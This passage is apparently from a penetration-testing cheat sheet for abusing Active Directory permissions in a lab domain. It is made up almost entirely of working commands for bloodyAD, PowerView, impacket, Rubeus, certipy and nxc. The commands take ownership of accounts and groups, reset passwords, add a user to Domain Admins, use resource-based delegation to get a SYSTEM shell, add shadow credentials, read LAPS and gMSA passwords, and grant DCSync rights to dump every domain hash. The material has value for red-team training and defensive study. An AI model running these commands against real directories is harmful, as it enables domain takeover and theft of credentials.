bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 remove uac targetuser -f ACCOUNTDISABLE
# PowerView: toggle the disabled bit (bit 1 = 0x2) via XOR on userAccountControl
Set-DomainObject -Credential $Cred -Identity targetuser -XOR @{useraccountcontrol=2} -Verbose
# ════════════════════════════════════════════════════════════════
# [USER] WriteOwner — take ownership → WriteDACL → GenericAll → reset password
# ════════════════════════════════════════════════════════════════
# bloodyAD: set sec_user as the owner of targetuser — grants implicit WriteDACL
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 set owner targetuser sec_user
# bloodyAD: use new ownership to grant sec_user full control (GenericAll) on target
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add genericAll targetuser sec_user
# bloodyAD: now reset the password using the GenericAll right
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 set password targetuser 'NewP@ssw0rd!'
# PowerView: take ownership of targetuser object
Set-DomainObjectOwner -Credential $Cred -Identity targetuser -OwnerIdentity sec_user
# PowerView: as new owner, grant yourself GenericAll (full control) on the object
Add-DomainObjectAcl -Credential $Cred -TargetIdentity targetuser -PrincipalIdentity sec_user -Rights All
# PowerView: use GenericAll to reset the target's password
$pass = ConvertTo-SecureString 'NewP@ssw0rd!' -AsPlainText -Force
Set-DomainUserPassword -Identity targetuser -AccountPassword $pass -Credential $Cred
# ════════════════════════════════════════════════════════════════
# [USER] WriteDACL — grant GenericAll on user
# ════════════════════════════════════════════════════════════════
# bloodyAD: abuse WriteDACL to add a GenericAll ACE for sec_user on the target
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add genericAll targetuser sec_user
# PowerView: write a GenericAll ACE onto target — after this you control the object
Add-DomainObjectAcl -Credential $Cred -TargetIdentity targetuser -PrincipalIdentity sec_user -Rights All
# impacket dacledit: low-level DACL write — grants FullControl directly in the ACL
impacket-dacledit senshu.local/sec_user:'P@ssw0rd' -dc-ip 10.10.10.27 -target targetuser -action write -rights FullControl
# ════════════════════════════════════════════════════════════════
# [GROUP] GenericAll / GenericWrite / WriteProperty(member) / Self — add member
# ════════════════════════════════════════════════════════════════
# bloodyAD: add sec_user to the target group
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add groupMember "Domain Admins" sec_user
# net rpc: add member to group remotely from Linux (no PowerShell needed)
net rpc group addmem "Domain Admins" sec_user -U 'senshu.local/sec_user%P@ssw0rd' -S 10.10.10.27
# PowerView: add sec_user into the group using explicit credentials
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'sec_user' -Credential $Cred
# impacket-dacledit: grant WriteMembers right on target group — then add member
impacket-dacledit senshu.local/sec_user:'P@ssw0rd' -dc-ip 10.10.10.27 -target "Domain Admins" -action write -rights WriteMembers
impacket-dacledit senshu.local/sec_user -hashes aad3b435b51404eeaad3b435b51404ee:NTHASH -dc-ip 10.10.10.27 -target "Domain Admins" -action write -rights WriteMembers
# ════════════════════════════════════════════════════════════════
# [GROUP] WriteOwner — take ownership → grant GenericAll → add member
# ════════════════════════════════════════════════════════════════
# bloodyAD: become owner of the group object
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 set owner "Domain Admins" sec_user
# bloodyAD: use ownership to write GenericAll ACE on the group
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add genericAll "Domain Admins" sec_user
# bloodyAD: add yourself to the group now that you have GenericAll
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add groupMember "Domain Admins" sec_user
# PowerView: take ownership of the group object
Set-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity sec_user
# PowerView: grant GenericAll on the group using your new ownership
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity sec_user -Rights All
# PowerView: add yourself to the group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'sec_user' -Credential $Cred
# ════════════════════════════════════════════════════════════════
# [COMPUTER] GenericAll / GenericWrite — RBCD
# Impersonate any user to the target computer via S4U2Self + S4U2Proxy
# ════════════════════════════════════════════════════════════════
# bloodyAD: check how many machine accounts normal users can create (default 10)
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get object 'DC=senshu,DC=sh' --attr ms-DS-MachineAccountQuota
# bloodyAD: create an attacker-controlled machine account to delegate from
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add computer FAKE01 'FakePass123!'
# bloodyAD: write FAKE01$ into TARGET$'s msDS-AllowedToActOnBehalfOfOtherIdentity — enables RBCD
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add rbcd 'TARGET$' 'FAKE01$'
# impacket: perform S4U2Self + S4U2Proxy as FAKE01$ to get a service ticket impersonating Administrator
impacket-getST senshu.local/'FAKE01$':'FakePass123!' -spn cifs/TARGET.senshu.local -impersonate Administrator -dc-ip 10.10.10.27
# load the impersonation ticket into the environment
export KRB5CCNAME=Administrator.ccache
# use the ticket to get a SYSTEM shell on the target
impacket-psexec senshu.local/Administrator@TARGET.senshu.local -k -no-pass
# Powermad: create attacker machine account from Windows without admin rights
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString 'FakePass123!' -AsPlainText -Force) -Verbose
# PowerView: get the SID of the new machine account to build the security descriptor
$ComputerSid = Get-DomainComputer FAKE01 -Properties objectsid | Select -Expand objectsid
# build a raw security descriptor granting FAKE01$ full delegation rights
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0)
# PowerView: write the descriptor into TARGET$'s msDS-AllowedToActOnBehalfOfOtherIdentity
Get-DomainComputer TARGET$ | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
# Rubeus: S4U2Self + S4U2Proxy — inject the resulting ticket directly into the current session
.\Rubeus.exe s4u /user:FAKE01$ /rc4:NTHASH /impersonateuser:Administrator /msdsspn:cifs/TARGET.senshu.local /ptt
# ════════════════════════════════════════════════════════════════
# [COMPUTER] GenericAll / GenericWrite / AddKeyCredentialLink — Shadow Credentials
# ════════════════════════════════════════════════════════════════
# bloodyAD: add a key credential on the computer object — enables PKINIT auth as the machine account
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add shadowCredentials 'TARGET$'
# certipy: auto mode — add key, get TGT for machine account, retrieve its NT hash
certipy shadow auto -target DC01.senshu.local -u sec_user@senshu.local -p 'P@ssw0rd' -account 'TARGET$'
# certipy: authenticate with the machine cert to get the NT hash — usable for S4U or PtH
certipy auth -pfx TARGET.pfx -dc-ip 10.10.10.27
# Rubeus: request TGT for the machine account using its certificate — then use for S4U
.\Rubeus.exe asktgt /user:TARGET$ /certificate:TARGET.pfx /password:certpass /domain:senshu.local /dc:DC01.senshu.local /ptt
# ════════════════════════════════════════════════════════════════
# [COMPUTER] GenericAll — read LAPS local admin password
# ════════════════════════════════════════════════════════════════
# bloodyAD: search all computers with a LAPS password set and read them
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get search \
--filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
# nxc: read LAPS passwords from LDAP for all computers you have access to
nxc ldap 10.10.10.27 -u sec_user -p 'P@ssw0rd' -M laps
# PowerView: read the LAPS password for a specific computer
Get-DomainComputer -Identity TARGET -Properties ms-Mcs-AdmPwd | Select ms-Mcs-AdmPwd
# ════════════════════════════════════════════════════════════════
# [DOMAIN] WriteDACL / GenericAll — grant DCSync rights → dump all hashes
# ════════════════════════════════════════════════════════════════
# bloodyAD: add DS-Replication-Get-Changes(-All) extended rights to sec_user on the domain object
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add dcsync sec_user
# PowerView: grant the two DS-Replication extended rights required for DCSync
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=senshu,DC=local" -PrincipalIdentity sec_user -Rights DCSync -Verbose
# impacket-dacledit: write DCSync rights directly on the domain object
impacket-dacledit senshu.local/sec_user:'P@ssw0rd' -dc-ip 10.10.10.27 -target-dn "DC=senshu,DC=local" -action write -rights DCSync
impacket-dacledit senshu.local/sec_user -hashes aad3b435b51404eeaad3b435b51404ee:NTHASH -dc-ip 10.10.10.27 -target-dn "DC=senshu,DC=local" -action write -rights DCSync
# secretsdump: replicate all hashes from the DC using the newly granted DCSync rights
impacket-secretsdump senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
# ════════════════════════════════════════════════════════════════
# [DOMAIN] WriteOwner — take ownership → WriteDACL → DCSync
# ════════════════════════════════════════════════════════════════
# bloodyAD: become owner of the domain object — unlocks WriteDACL on it
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 set owner 'DC=senshu,DC=sh' sec_user
# bloodyAD: use WriteDACL (via ownership) to grant DCSync replication rights
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add dcsync sec_user
# dump all domain hashes now that DCSync rights are in place
impacket-secretsdump senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
# PowerView: take ownership of the domain NC root object
Set-DomainObjectOwner -Credential $Cred -Identity "DC=senshu,DC=local" -OwnerIdentity sec_user
# PowerView: as owner, write DCSync replication rights onto the domain object
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=senshu,DC=local" -PrincipalIdentity sec_user -Rights DCSync -Verbose
# dump all hashes
impacket-secretsdump senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
# ════════════════════════════════════════════════════════════════
# [gMSA] GenericAll — read Group Managed Service Account password
# ════════════════════════════════════════════════════════════════
# bloodyAD: read the msDS-ManagedPassword blob — contains the current and previous NTLM hash
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get object 'gmsa_account$' --attr msDS-ManagedPassword
# nxc: enumerate and decode all readable gMSA passwords in the domain
nxc ldap 10.10.10.27 -u sec_user -p 'P@ssw0rd' --gmsa
|
